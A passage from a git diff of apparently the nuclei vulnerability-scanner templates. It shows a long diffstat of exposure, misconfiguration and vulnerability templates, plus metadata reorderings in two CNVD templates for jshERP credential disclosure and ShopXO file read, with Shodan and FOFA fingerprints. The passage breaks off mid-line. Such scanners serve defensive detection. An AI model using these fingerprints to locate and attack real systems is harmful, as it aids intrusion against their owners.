10 ++++----- http/exposures/logs/npm-debug-log.yaml | 11 +++++----- http/exposures/logs/npm-log-file.yaml | 11 +++++----- http/exposures/logs/opentsdb-status.yaml | 11 +++++----- .../exposures/logs/redis-exception-error.yaml | 11 +++++----- http/exposures/logs/ws-ftp-log.yaml | 11 +++++----- http/exposures/logs/yii-error-page.yaml | 11 +++++----- http/exposures/tokens/jwk-json-leak.yaml | 20 +++++++++-------- .../iot/grandstream-device-configuration.yaml | 17 +++++++------- http/iot/honeywell-building-control.yaml | 17 +++++++------- http/iot/hp-color-laserjet-detect.yaml | 11 +++++----- http/iot/hue-personal-wireless-panel.yaml | 17 +++++++------- http/iot/loytec-device.yaml | 11 +++++----- http/iot/zebra-printer-detect.yaml | 11 +++++----- .../exposed-file-upload-form.yaml | 11 +++++----- http/miscellaneous/microsoft-azure-error.yaml | 17 +++++++------- .../netflix-conductor-version.yaml | 17 +++++++------- http/misconfiguration/aem/aem-acs-common.yaml | 11 +++++----- http/misconfiguration/aem/aem-bg-servlet.yaml | 16 +++++++------- http/misconfiguration/aem/aem-bulkeditor.yaml | 10 ++++----- .../aem/aem-cached-pages.yaml | 17 +++++++------- http/misconfiguration/aem/aem-crx-bypass.yaml | 16 +++++++------- .../aem/aem-crx-namespace.yaml | 11 +++++----- http/misconfiguration/aem/aem-crx-search.yaml | 10 ++++----- .../aem/aem-custom-script.yaml | 10 ++++----- .../aem/aem-debugging-libraries.yaml | 10 ++++----- .../aem/aem-default-get-servlet.yaml | 19 ++++++++-------- http/misconfiguration/aem/aem-disk-usage.yaml | 11 +++++----- .../aem/aem-dump-contentnode.yaml | 11 +++++----- .../aem/aem-explorer-nodetypes.yaml | 11 +++++----- .../aem/aem-external-link-checker.yaml | 10 ++++----- .../misconfiguration/aem/aem-gql-servlet.yaml | 19 ++++++++-------- .../aem/aem-groovyconsole.yaml | 16 +++++++------- .../aem/aem-hash-querybuilder.yaml | 17 +++++++------- .../aem/aem-login-status.yaml | 16 +++++++------- .../aem/aem-merge-metadata-servlet.yaml | 16 +++++++------- .../aem/aem-offloading-browser.yaml | 11 +++++----- .../aem/aem-osgi-bundles.yaml | 11 +++++----- .../aem-querybuilder-internal-path-read.yaml | 17 +++++++------- .../aem/aem-querybuilder-json-servlet.yaml | 16 +++++++------- .../aem/aem-sling-userinfo.yaml | 10 ++++----- .../aem/aem-userinfo-servlet.yaml | 17 +++++++------- .../airflow/airflow-debug.yaml | 11 +++++----- .../airflow/unauthenticated-airflow.yaml | 17 +++++++------- .../ampache-update-exposure.yaml | 11 +++++----- .../apache-drill-exposure.yaml | 11 +++++----- .../misconfiguration/apache-druid-unauth.yaml | 11 +++++----- http/misconfiguration/apache-impala.yaml | 11 +++++----- .../apache-struts-showcase.yaml | 11 +++++----- .../misconfiguration/apple-cups-exposure.yaml | 11 +++++----- .../atlassian-bamboo-build.yaml | 10 ++++----- .../bitbucket-auth-bypass.yaml | 10 ++++----- .../bitbucket-public-repository.yaml | 11 +++++----- .../browserless-debugger.yaml | 16 +++++++------- .../casdoor-users-password.yaml | 11 +++++----- http/misconfiguration/chatgpt-web-unauth.yaml | 11 +++++----- .../clickhouse-unauth-api.yaml | 11 +++++----- .../codeigniter-errorpage.yaml | 11 +++++----- http/misconfiguration/codemeter-webadmin.yaml | 11 +++++----- .../confluence/confluence-oauth-admin.yaml | 10 ++++----- .../misconfiguration/debug/ampache-debug.yaml | 10 ++++----- http/misconfiguration/debug/bottle-debug.yaml | 10 ++++----- .../debug/flask-werkzeug-debug.yaml | 11 +++++----- http/misconfiguration/debug/github-debug.yaml | 10 ++++----- .../dlink-unauth-cgi-script.yaml | 11 +++++----- .../docmosis-tornado-server.yaml | 11 +++++----- .../drupal/drupal-user-enum-redirect.yaml | 10 ++++----- http/misconfiguration/elasticsearch.yaml | 11 +++++----- .../envoy-admin-exposure.yaml | 11 +++++----- http/misconfiguration/esphome-dashboard.yaml | 10 ++++----- http/misconfiguration/everything-listing.yaml | 10 ++++----- .../misconfiguration/feiyuxing-info-leak.yaml | 10 ++++----- http/misconfiguration/freshrss-unauth.yaml | 19 ++++++++-------- .../fusionauth-admin-setup.yaml | 11 +++++----- .../ganglia-cluster-dashboard.yaml | 10 ++++----- http/misconfiguration/git-web-interface.yaml | 17 +++++++------- .../misconfiguration/gitea-public-signup.yaml | 11 +++++----- .../gitlab/gitlab-public-repos.yaml | 16 +++++++------- .../gitlab/gitlab-public-signup.yaml | 18 ++++++++------- http/misconfiguration/gitlist-disclosure.yaml | 17 +++++++------- .../global-traffic-statistics.yaml | 11 +++++----- .../gocd/gocd-cruise-configuration.yaml | 17 +++++++------- .../gocd/gocd-encryption-key.yaml | 17 +++++++------- .../gocd/gocd-unauth-dashboard.yaml | 17 +++++++------- .../grafana-public-signup.yaml | 17 +++++++------- .../graphql/graphql-playground.yaml | 10 ++++----- .../misconfiguration/grav-register-admin.yaml | 11 +++++----- http/misconfiguration/h2o/h2o-dashboard.yaml | 12 +++++----- .../haproxy-exporter-metrics.yaml | 11 +++++----- .../helm-dashboard-exposure.yaml | 11 +++++----- http/misconfiguration/hfs-exposure.yaml | 10 ++++----- .../hp/unauthorized-printer-hp.yaml | 17 +++++++------- .../ibm-friendly-path-exposure.yaml | 17 +++++++------- .../installer/activecollab-installer.yaml | 11 +++++----- .../installer/adguard-installer.yaml | 19 ++++++++-------- .../installer/alma-installer.yaml | 11 +++++----- .../installer/ampache-music-installer.yaml | 11 +++++----- .../atlassian-bamboo-setup-wizard.yaml | 11 +++++----- .../installer/bagisto-installer.yaml | 11 +++++----- .../installer/bitrix24-installer.yaml | 11 +++++----- .../installer/call-com-installer.yaml | 11 +++++----- .../installer/chamilo-installer.yaml | 12 +++++----- .../installer/clipbucket-installer.yaml | 11 +++++----- .../installer/cloudcenter-Installer.yaml | 11 +++++----- .../installer/codeigniter-installer.yaml | 11 +++++----- .../installer/combodo-itop-installer.yaml | 11 +++++----- .../installer/concrete-installer.yaml | 11 +++++----- .../installer/connectwise-setup.yaml | 11 +++++----- .../installer/custom-xoops-installer.yaml | 11 +++++----- .../installer/discourse-installer.yaml | 11 +++++----- .../installer/dokuwiki-installer.yaml | 11 +++++----- .../installer/dolibarr-installer.yaml | 11 +++++----- .../installer/dolphin-installer.yaml | 11 +++++----- .../installer/ejbca-enterprise-installer.yaml | 11 +++++----- .../installer/elgg-install.yaml | 19 ++++++++-------- .../installer/eshop-installer.yaml | 11 +++++----- .../installer/espocrm-installer.yaml | 11 +++++----- .../installer/facturascripts-installer.yaml | 11 +++++----- .../installer/flarum-installer.yaml | 11 +++++----- .../installer/fossbilling-installer.yaml | 11 +++++----- .../installer/freshrss-installer.yaml | 19 ++++++++-------- .../installer/froxlor-installer.yaml | 11 +++++----- .../installer/gitea-installer.yaml | 11 +++++----- .../installer/glpi-installer.yaml | 11 +++++----- .../installer/growi-installer.yaml | 11 +++++----- .../installer/impresspages-installer.yaml | 11 +++++----- .../installer/jira-setup.yaml | 11 +++++----- .../installer/joomla-installer.yaml | 11 +++++----- .../installer/knowledgetree-installer.yaml | 11 +++++----- .../installer/kodbox-installer.yaml | 11 +++++----- .../installer/librenms-installer.yaml | 11 +++++----- .../installer/limesurvey-installer.yaml | 5 ++--- .../installer/lychee-installer.yaml | 11 +++++----- .../installer/magento-installer.yaml | 11 +++++----- .../installer/magnolia-installer.yaml | 11 +++++----- .../installer/mantisbt-installer.yaml | 11 +++++----- .../installer/matomo-installer.yaml | 11 +++++----- .../installer/mautic-installer.yaml | 11 +++++----- .../installer/monstra-installer.yaml | 11 +++++----- .../installer/moodle-installer.yaml | 11 +++++----- .../installer/moosocial-installer.yaml | 11 +++++----- .../installer/mosparo-install.yaml | 11 +++++----- .../installer/mura-cms-setup-installer.yaml | 11 +++++----- .../installer/nagiosxi-installer.yaml | 11 +++++----- .../installer/nodebb-installer.yaml | 11 +++++----- .../installer/octoprint-installer.yaml | 11 +++++----- .../installer/ojs-installer.yaml | 11 +++++----- .../installer/onlyoffice-installer.yaml | 11 +++++----- .../installer/openemr-setup-installer.yaml | 11 +++++----- .../installer/openfire-setup.yaml | 11 +++++----- .../installer/openmage-install.yaml | 11 +++++----- .../installer/opensis-installer.yaml | 11 +++++----- .../installer/orangehrm-installer.yaml | 11 +++++----- .../installer/orangescrum-install.yaml | 11 +++++----- .../installer/orchard-installer.yaml | 11 +++++----- .../owncloud-installer-exposure.yaml | 11 +++++----- .../installer/oxid-eshop-installer.yaml | 11 +++++----- .../installer/pagekit-installer.yaml | 11 +++++----- .../installer/pandora-fms-installer.yaml | 11 +++++----- .../installer/permissions-installer.yaml | 11 +++++----- .../installer/phpbb-installer.yaml | 11 +++++----- .../installer/phpgedview-installer.yaml | 11 +++++----- .../installer/phpipam-installer.yaml | 11 +++++----- .../installer/phpmyfaq-installer.yaml | 11 +++++----- .../installer/phpwind-installer.yaml | 11 +++++----- .../installer/piwigo-installer.yaml | 11 +++++----- .../installer/pmm-installer.yaml | 11 +++++----- .../installer/poste-io-installer.yaml | 11 +++++----- .../installer/prestashop-installer.yaml | 11 +++++----- .../installer/processwire-installer.yaml | 11 +++++----- .../installer/projectsend-installer.yaml | 12 +++++----- .../installer/qloapps-installer.yaml | 12 +++++----- .../installer/redash-installer.yaml | 11 +++++----- .../installer/sabnzbd-installer.yaml | 12 +++++----- .../installer/server-monitor-installer.yaml | 11 +++++----- .../installer/setup-github-enterprise.yaml | 11 +++++----- .../installer/shopware-installer.yaml | 11 +++++----- .../installer/smf-installer.yaml | 11 +++++----- .../installer/snipe-it-installer.yaml | 11 +++++----- .../installer/spa-cart-installer.yaml | 16 +++++++------- .../installer/subrion-installer.yaml | 11 +++++----- .../installer/sugarcrm-install.yaml | 11 +++++----- .../installer/suitecrm-installer.yaml | 11 +++++----- .../installer/tasmota-install.yaml | 11 +++++----- .../installer/tastyigniter-installer.yaml | 11 +++++----- .../installer/tautulli-install.yaml | 11 +++++----- .../installer/testrail-install.yaml | 11 +++++----- .../installer/tiny-rss-installer.yaml | 11 +++++----- .../installer/typo3-installer.yaml | 11 +++++----- .../installer/umbraco-installer.yaml | 11 +++++----- .../installer/uvdesk-install.yaml | 11 +++++----- .../installer/vtiger-installer.yaml | 11 +++++----- .../installer/webcalendar-install.yaml | 11 +++++----- .../installer/webtrees-install.yaml | 11 +++++----- .../installer/webuzo-installer.yaml | 11 +++++----- .../installer/wiki-js-installer.yaml | 11 +++++----- .../installer/wowonder-installer.yaml | 11 +++++----- .../installer/yzmcms-installer.yaml | 11 +++++----- .../installer/zencart-installer.yaml | 11 +++++----- .../misconfiguration/jaeger-ui-dashboard.yaml | 19 ++++++++-------- .../jenkins/jenkins-openuser-register.yaml | 10 ++++----- .../jetty-showcontexts-enable.yaml | 11 +++++----- .../jupyter-notebooks-exposed.yaml | 17 +++++++------- .../kubernetes/kube-state-metrics.yaml | 10 ++++----- .../misconfiguration/label-studio-signup.yaml | 11 +++++----- .../libvirt-exporter-metrics.yaml | 11 +++++----- .../misconfiguration/liferay/liferay-api.yaml | 10 ++++----- .../liferay/liferay-axis.yaml | 10 ++++----- .../liferay/liferay-jsonws.yaml | 11 +++++----- http/misconfiguration/locust-exposure.yaml | 11 +++++----- .../manage-engine-ad-search.yaml | 10 ++++----- http/misconfiguration/mongod-exposure.yaml | 11 +++++----- .../ms-exchange-user-enum.yaml | 11 +++++----- .../multilaser-pro-setup.yaml | 10 ++++----- http/misconfiguration/mysql-history.yaml | 10 ++++----- .../nacos/nacos-create-user.yaml | 11 +++++----- http/misconfiguration/ntop-panel-exposed.yaml | 10 ++++----- .../odoo-unprotected-database.yaml | 10 ++++----- http/misconfiguration/openstack-config.yaml | 16 +++++++------- .../oracle-reports-services.yaml | 10 ++++----- http/misconfiguration/pcdn-cache-node.yaml | 11 +++++----- http/misconfiguration/perfsonar-toolkit.yaml | 11 +++++----- http/misconfiguration/php-errors.yaml | 16 +++++++------- http/misconfiguration/phpcli-stack-trace.yaml | 10 ++++----- http/misconfiguration/python-metrics.yaml | 16 +++++++------- .../rabbitmq-exporter-metrics.yaml | 11 +++++----- http/misconfiguration/ray-dashboard.yaml | 11 +++++----- .../request-baskets-exposure.yaml | 11 +++++----- http/misconfiguration/selenium-exposure.yaml | 11 +++++----- .../sentinel-license-monitor.yaml | 11 +++++----- .../servicenow-widget-misconfig.yaml | 10 ++++----- http/misconfiguration/sftpgo-admin-setup.yaml | 19 ++++++++-------- http/misconfiguration/smarterstats-setup.yaml | 11 +++++----- http/misconfiguration/smokeping-grapher.yaml | 11 +++++----- .../solr-query-dashboard.yaml | 14 ++++++------ .../sonarqube-projects-disclosure.yaml | 10 ++++----- .../sql-server-report-viewer.yaml | 11 +++++----- .../misconfiguration/struts-ognl-console.yaml | 10 ++++----- http/misconfiguration/symfony-debug.yaml | 12 +++++----- http/misconfiguration/symfony-fragment.yaml | 10 ++++----- .../misconfiguration/syncthing-dashboard.yaml | 11 +++++----- .../tasmota-config-webui.yaml | 11 +++++----- .../teslamate-unauth-access.yaml | 10 ++++----- http/misconfiguration/thinkphp-errors.yaml | 11 +++++----- http/misconfiguration/tomcat-stacktraces.yaml | 11 +++++----- http/misconfiguration/typo3-composer.yaml | 10 ++++----- http/misconfiguration/typo3-debug-mode.yaml | 11 +++++----- .../unauth-apache-kafka-ui.yaml | 10 ++++----- .../unauth-celery-flower.yaml | 17 +++++++------- http/misconfiguration/unauth-etherpad.yaml | 10 ++++----- .../unauth-ldap-account-manager.yaml | 11 +++++----- http/misconfiguration/unauth-mercurial.yaml | 11 +++++----- .../unauthenticated-alert-manager.yaml | 16 +++++++------- .../unauthenticated-mongo-express.yaml | 10 ++++----- .../unauthorized-h3csecparh-login.yaml | 10 ++++----- .../untangle-admin-setup.yaml | 11 +++++----- http/technologies/4D-detect.yaml | 12 +++++----- http/technologies/activecollab-detect.yaml | 16 +++++++------- .../adobe/adobe-coldfusion-detect.yaml | 10 ++++----- .../adobe/adobe-coldfusion-error-detect.yaml | 10 ++++----- http/technologies/aem-detect.yaml | 16 +++++++------- http/technologies/aerocms-detect.yaml | 10 ++++----- http/technologies/angular-detect.yaml | 10 ++++----- http/technologies/apache/airflow-detect.yaml | 11 +++++----- .../apache/apache-answer-detect.yaml | 11 +++++----- .../apache/apache-axis-detect.yaml | 10 ++++----- .../apache/apache-cloudstack-detect.yaml | 16 ++++++++------ .../apache/apache-cocoon-detect.yaml | 10 ++++----- .../apache/apache-dubbo-detect.yaml | 16 +++++++------- .../apache/apache-karaf-panel.yaml | 10 ++++----- .../apache/apache-ofbiz-detect.yaml | 19 ++++++++-------- .../apache/apache-streampipes-detect.yaml | 22 +++++++++---------- .../apache/apache-tapestry-detect.yaml | 16 +++++++------- .../apache/apache-zeppelin-detect.yaml | 16 +++++++------- .../apache/default-apache-test-all.yaml | 16 +++++++------- .../apache/default-apache-test-page.yaml | 16 +++++++------- .../apache/default-apache2-page.yaml | 16 +++++++------- .../technologies/apache/ranger-detection.yaml | 16 +++++++------- .../apache/xampp-default-page.yaml | 16 +++++++------- http/technologies/appcms-detect.yaml | 16 +++++++------- http/technologies/autobahn-python-detect.yaml | 16 +++++++------- http/technologies/avideo-detect.yaml | 10 ++++----- http/technologies/b2b-builder-detect.yaml | 16 +++++++------- http/technologies/bamboo-detect.yaml | 9 ++++---- http/technologies/bigbluebutton-detect.yaml | 16 +++++++------- http/technologies/bigip-apm-detect.yaml | 11 +++++----- http/technologies/casaos-detection.yaml | 18 +++++++-------- .../checkpoint-mobile-detect.yaml | 10 ++++----- http/technologies/chevereto-detect.yaml | 16 +++++++------- http/technologies/citrix-hypervisor-page.yaml | 10 ++++----- .../citrix-xenmobile-version.yaml | 12 +++++----- .../connectwise-control-detect.yaml | 10 ++++----- http/technologies/couchbase-sync-gateway.yaml | 16 +++++++------- http/technologies/craftercms-detect.yaml | 11 +++++----- http/technologies/cvsweb-detect.yaml | 10 ++++----- http/technologies/dash-panel-detect.yaml | 10 ++++----- http/technologies/dedecms-detect.yaml | 10 ++++----- http/technologies/default-apache-shiro.yaml | 10 ++++----- http/technologies/default-cakephp-page.yaml | 10 ++++----- .../default-codeigniter-page.yaml | 16 +++++++------- http/technologies/default-django-page.yaml | 16 +++++++------- http/technologies/default-fastcgi-page.yaml | 16 +++++++------- http/technologies/default-fedora-page.yaml | 16 +++++++------- .../default-glassfish-server-page.yaml | 17 +++++++------- http/technologies/default-jetty-page.yaml | 16 +++++++------- http/technologies/default-lighttpd-page.yaml | 16 +++++++------- .../default-lighttpd-placeholder-page.yaml | 16 +++++++------- http/technologies/default-movable-page.yaml | 4 ++-- http/technologies/default-openresty.yaml | 16 +++++++------- .../technologies/default-parallels-plesk.yaml | 10 ++++----- .../default-payara-server-page.yaml | 16 +++++++------- http/technologies/default-plesk-page.yaml | 16 +++++++------- .../default-redhat-test-page.yaml | 16 +++++++------- http/technologies/default-sitecore-page.yaml | 10 ++++----- .../default-ssltls-test-page.yaml | 16 +++++++------- http/technologies/default-symfony-page.yaml | 10 ++++----- http/technologies/default-tengine-page.yaml | 10 ++++----- .../default-websphere-liberty.yaml | 10 ++++----- http/technologies/devexpress-detect.yaml | 17 +++++++------- http/technologies/directus-detect.yaml | 11 +++++----- http/technologies/drupal-detect.yaml | 10 ++++----- .../elasticsearch-sql-client-detect.yaml | 16 +++++++------- http/technologies/element-web-detect.yaml | 11 +++++----- http/technologies/empirecms-detect.yaml | 16 +++++++------- http/technologies/gitbook-detect.yaml | 10 ++++----- http/technologies/glpi-status-page.yaml | 10 ++++----- http/technologies/goliath-detect.yaml | 10 ++++----- .../google/chromecast-detect.yaml | 11 +++++----- .../graylog/graylog-api-exposure.yaml | 11 +++++----- http/technologies/hugo-detect.yaml | 10 ++++----- http/technologies/ibm/ibm-http-server.yaml | 16 +++++++------- http/technologies/ibm/ibm-odm-detect.yaml | 11 +++++----- http/technologies/icecast-server-detect.yaml | 10 ++++----- .../identity-server-v3-detect.yaml | 12 +++++----- http/technologies/imgproxy-detect.yaml | 11 +++++----- http/technologies/interactsh-server.yaml | 10 ++++----- http/technologies/ispyconnect-detect.yaml | 10 ++++----- http/technologies/jeecg-boot-detect.yaml | 16 +++++++------- http/technologies/jellyfin-detect.yaml | 10 ++++----- http/technologies/jhipster-detect.yaml | 10 ++++----- http/technologies/jitsi-meet-detect.yaml | 16 +++++++------- http/technologies/joomla-detect.yaml | 10 ++++----- http/technologies/kodexplorer-detect.yaml | 16 +++++++------- http/technologies/landesk/landesk-ma.yaml | 10 ++++----- http/technologies/limesurvey-detect.yaml | 10 ++++----- http/technologies/livehelperchat-detect.yaml | 10 ++++----- http/technologies/magento-detect.yaml | 10 ++++----- http/technologies/magmi-detect.yaml | 10 ++++----- .../matrix-homeserver-detect.yaml | 12 +++++----- http/technologies/microsoft-iis-8.yaml | 16 +++++++------- .../microsoft/default-iis7-page.yaml | 16 +++++++------- .../default-microsoft-azure-page.yaml | 16 +++++++------- .../default-windows-server-page.yaml | 16 +++++++------- http/technologies/mikrotik-httpproxy.yaml | 10 ++++----- http/technologies/mongoose-server.yaml | 10 ++++----- http/technologies/moveit-transfer-detect.yaml | 10 ++++----- http/technologies/nextcloud-detect.yaml | 10 ++++----- .../nextcloud-owncloud-detect.yaml | 11 +++++----- http/technologies/nexus-detect.yaml | 10 ++++----- http/technologies/notion-detect.yaml | 10 ++++----- http/technologies/open-journal-systems.yaml | 10 ++++----- http/technologies/openhap-detect.yaml | 10 ++++----- http/technologies/openproject-detect.yaml | 10 ++++----- http/technologies/openssl-detect.yaml | 10 ++++----- http/technologies/oracle/oracle-dbcs.yaml | 16 +++++++------- .../oracle/oracle-iplanet-web-server.yaml | 16 +++++++------- .../oracle/oracle-webcenter-sites.yaml | 10 ++++----- .../payara-micro-server-detect.yaml | 10 ++++----- http/technologies/pbootcms-detect.yaml | 10 ++++----- http/technologies/pexip-detect.yaml | 11 +++++----- http/technologies/php-detect.yaml | 10 ++++----- http/technologies/php-fusion-detect.yaml | 16 +++++++------- http/technologies/phplist-detect.yaml | 10 ++++----- http/technologies/pi-hole-detect.yaml | 10 ++++----- http/technologies/prestashop-detect.yaml | 16 +++++++------- http/technologies/privatebin-detect.yaml | 12 +++++----- http/technologies/pypiserver-detect.yaml | 10 ++++----- .../roundcube-webmail-portal.yaml | 16 +++++++------- http/technologies/rseenet-detect.yaml | 4 ++-- http/technologies/rsshub-detect.yaml | 10 ++++----- http/technologies/samsung-smarttv-debug.yaml | 10 ++++----- .../sharefile-storage-server.yaml | 10 ++++----- http/technologies/shopware-detect.yaml | 10 ++++----- http/technologies/simplesamlphp-detect.yaml | 12 +++++----- http/technologies/sitecore-cms.yaml | 10 ++++----- http/technologies/smartstore-detect.yaml | 16 +++++++------- http/technologies/sogo-detect.yaml | 10 ++++----- http/technologies/statamic-detect.yaml | 11 +++++----- http/technologies/subrion-cms-detect.yaml | 18 +++++++-------- .../tibco-businessconnect-detect.yaml | 11 +++++----- .../tibco-spotfire-services-detect.yaml | 11 +++++----- http/technologies/tinyproxy-detect.yaml | 11 +++++----- http/technologies/typo3-detect.yaml | 16 +++++++------- http/technologies/utility-service-detect.yaml | 10 ++++----- http/technologies/vbulletin-detect.yaml | 10 ++++----- .../versa/versa-analytics-server.yaml | 10 ++++----- .../versa/versa-director-api.yaml | 10 ++++----- .../versa/versa-networks-detect.yaml | 10 ++++----- .../vivotex-web-console-detect.yaml | 18 +++++++-------- .../vmware/vmware-horizon-version.yaml | 10 ++++----- .../technologies/wing-ftp-service-detect.yaml | 11 +++++----- http/technologies/wms-server-detect.yaml | 10 ++++----- .../themes/wp-bricks-builder-theme.yaml | 11 +++++----- http/technologies/xenforo-detect.yaml | 16 +++++++------- .../technologies/xerox-workcentre-detect.yaml | 10 ++++----- http/technologies/yapi-detect.yaml | 16 +++++++------- http/technologies/yourls-detect.yaml | 11 +++++----- http/technologies/zend-server-test-page.yaml | 10 ++++----- .../apache/apache-nifi-rce.yaml | 4 ++-- .../citrix/citrix-oob-memory-read.yaml | 12 +++++----- .../dedecms-carbuyaction-fileinclude.yaml | 10 ++++----- http/vulnerabilities/dedecms/dedecms-rce.yaml | 4 ++-- .../discuz/discuz-api-pathinfo.yaml | 10 ++++----- .../ecstatic/node-ecstatic-listing.yaml | 5 +++-- .../esafenet-netsecconfigajax-sqli.yaml | 19 ++++++++-------- http/vulnerabilities/gitea/gitea-rce.yaml | 10 ++++----- .../jira-unauthenticated-adminprojects.yaml | 16 +++++++------- .../jira/jira-unauthenticated-dashboards.yaml | 16 +++++++------- .../jira/jira-unauthenticated-screens.yaml | 16 +++++++------- .../jira-unauthenticated-user-picker.yaml | 16 +++++++------- http/vulnerabilities/juniper/junos-xss.yaml | 14 ++++++------ .../vulnerabilities/jupyter-notebook-rce.yaml | 10 ++++----- .../landray/landray-eis-sqli.yaml | 11 +++++----- .../landray/landray-oa-replaceextend-rce.yaml | 13 +++++------ .../landray/landray-oa-treexml-rce.yaml | 10 ++++----- .../magento/magento-2-exposed-api.yaml | 16 +++++++------- .../magento/magento-cacheleak.yaml | 10 ++++----- .../magento-unprotected-dev-files.yaml | 10 ++++----- .../nuxt/nuxt-js-semi-lfi.yaml | 11 +++++----- .../vulnerabilities/other/acti-video-lfi.yaml | 10 ++++----- http/vulnerabilities/other/bagisto-csti.yaml | 17 +++++++------- .../other/beyond-trust-xss.yaml | 10 ++++----- .../other/cmseasy-crossall-act-sqli.yaml | 10 ++++----- .../other/dixell-xweb500-filewrite.yaml | 17 +++++++------- .../other/doorgets-info-disclosure.yaml | 11 +++++----- .../other/ecology-oa-file-sqli.yaml | 10 ++++----- http/vulnerabilities/other/fastadmin-lfi.yaml | 11 +++++----- .../other/kingsoft-vgm-lfi.yaml | 10 ++++----- .../other/kiwitcms-json-rpc.yaml | 17 +++++++------- .../other/landray-oa-datajson-rce.yaml | 10 ++++----- .../other/nacos-auth-bypass.yaml | 10 ++++----- http/vulnerabilities/other/ncast-lfi.yaml | 19 ++++++++-------- .../other/phpldapadmin-xss.yaml | 11 +++++----- .../vulnerabilities/other/quick-cms-sqli.yaml | 12 +++++----- .../other/sharp-printers-lfi.yaml | 11 +++++----- http/vulnerabilities/other/slims-xss.yaml | 10 ++++----- .../other/tekon-info-leak.yaml | 16 +++++++------- .../other/tendat-credential.yaml | 11 +++++----- .../other/ups-network-lfi.yaml | 11 +++++----- .../other/webpagetest-ssrf.yaml | 11 +++++----- .../other/xxljob-executor-unauth.yaml | 10 ++++----- http/vulnerabilities/phpmyadmin-unauth.yaml | 10 ++++----- .../ruijie/ruijie-password-leak.yaml | 10 ++++----- .../sangfor/sangfor-ngaf-lfi.yaml | 10 ++++----- .../sitecore/sitecore-xml-xss.yaml | 10 ++++----- .../thinkphp6-arbitrary-write.yaml | 13 +++++------ .../tongda/tongda-action-uploadfile.yaml | 12 +++++----- .../tongda/tongda-auth-bypass.yaml | 11 +++++----- .../tongda/tongda-insert-sqli.yaml | 10 ++++----- .../tongda/tongda-meeting-unauth.yaml | 10 ++++----- .../tongda/tongda-report-func-sqli.yaml | 10 ++++----- .../tongda/tongda-video-file-read.yaml | 4 ++-- .../tongda/tongdaoa-auth-bypass.yaml | 12 +++++----- .../vulnerabilities/ueditor/ueditor-ssrf.yaml | 10 ++++----- .../vbulletin/vbulletin-search-sqli.yaml | 11 +++++----- .../vmware/vmware-cloud-xss.yaml | 11 +++++----- .../ecology-jqueryfiletree-traversal.yaml | 10 ++++----- .../ecology-verifyquicklogin-auth-bypass.yaml | 16 +++++++------- .../weaver/weaver-checkserver-sqli.yaml | 10 ++++----- .../weaver/weaver-ecology-bshservlet-rce.yaml | 11 +++++----- .../weaver/weaver-group-xml-sqli.yaml | 12 +++++----- .../weaver/weaver-mysql-config-info-leak.yaml | 10 ++++----- .../weaver/weaver-officeserver-lfi.yaml | 10 ++++----- .../weaver/weaver-signaturedownload-lfi.yaml | 10 ++++----- .../weaver-sptmforportalthumbnail-lfi.yaml | 10 ++++----- .../weaver/weaver-uploadify-file-upload.yaml | 12 +++++----- .../weaver/weaver-userselect-unauth.yaml | 10 ++++----- .../wechat/wechat-info-leak.yaml | 10 ++++----- .../wordpress/booked-export-csv.yaml | 10 ++++----- .../wordpress/photo-gallery-xss.yaml | 11 +++++----- .../photoblocks-grid-gallery-xss.yaml | 10 ++++----- .../wordpress/wordpress-ssrf-oembed.yaml | 17 +++++++------- .../wordpress/wp-mstore-plugin-listing.yaml | 16 +++++++------- .../wordpress/wp-social-warfare-rce.yaml | 10 ++++----- .../wordpress/wp-statistics-sqli.yaml | 12 +++++----- .../wp-superstorefinder-misconfig.yaml | 10 ++++----- http/vulnerabilities/wordpress/wp-sym404.yaml | 10 ++++----- .../wordpress/wp-touch-redirect.yaml | 10 ++++----- .../wordpress/wp-yoast-user-enumeration.yaml | 11 +++++----- .../yonyou/yonyou-nc-accept-fileupload.yaml | 10 ++++----- .../yonyou-nc-baseapp-deserialization.yaml | 10 ++++----- .../yonyou-nc-dispatcher-fileupload.yaml | 10 ++++----- .../yonyou/yonyou-nc-info-leak.yaml | 10 ++++----- .../yonyou-nc-ncmessageservlet-rce.yaml | 10 ++++----- .../yonyou/yonyou-ufida-nc-lfi.yaml | 11 +++++----- http/vulnerabilities/zend/zend-v1-xss.yaml | 10 ++++----- .../zyxel/unauth-ztp-ping.yaml | 10 ++++----- .../zzzcms/zzzcms-info-disclosure.yaml | 10 ++++----- http/vulnerabilities/zzzcms/zzzcms-xss.yaml | 4 ++-- 668 files changed, 4127 insertions(+), 3767 deletions(-) diff --git a/http/cnvd/2020/CNVD-2020-63964.yaml b/http/cnvd/2020/CNVD-2020-63964.yaml index f9328bd413..204a57b60d 100644 --- a/http/cnvd/2020/CNVD-2020-63964.yaml +++ b/http/cnvd/2020/CNVD-2020-63964.yaml @@ -8,16 +8,16 @@ info: jshERP that can reveal sensitive information including system credentials without credentials. reference: - https://cn-sec.com/archives/1798444.html - metadata: - max-request: 1 - shodan-query: http.favicon.hash:-1298131932 - fofa-query: jshERP-boot - product: jsherp - vendor: jishenghua - tags: cnvd,cnvd2020,jsherp,disclosure - classification: cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: jishenghua + product: jsherp + shodan-query: http.favicon.hash:-1298131932 + fofa-query: jshERP-boot + tags: cnvd,cnvd2020,jsherp,disclosure + http: - method: GET path: @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml index b9a7a87088..24cfe57a02 100644 --- a/http/cnvd/2021/CNVD-2021-15822.yaml +++ b/http/cnvd/2021/CNVD-2021-15822.yaml @@ -8,17 +8,17 @@ info: ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information. reference: - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog + classification: + cpe: cpe:2.3:a:shopxo:shopxo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: shopxo + product: shopxo shodan-query: title:"ShopXO企业级B2C电商系统提供商" fofa-query: app="ShopXO企业级B2C电商系统提供商" - product: shopxo - vendor: shopxo tags: cnvd2021,cnvd,shopxo,lfi - classification: - cpe: 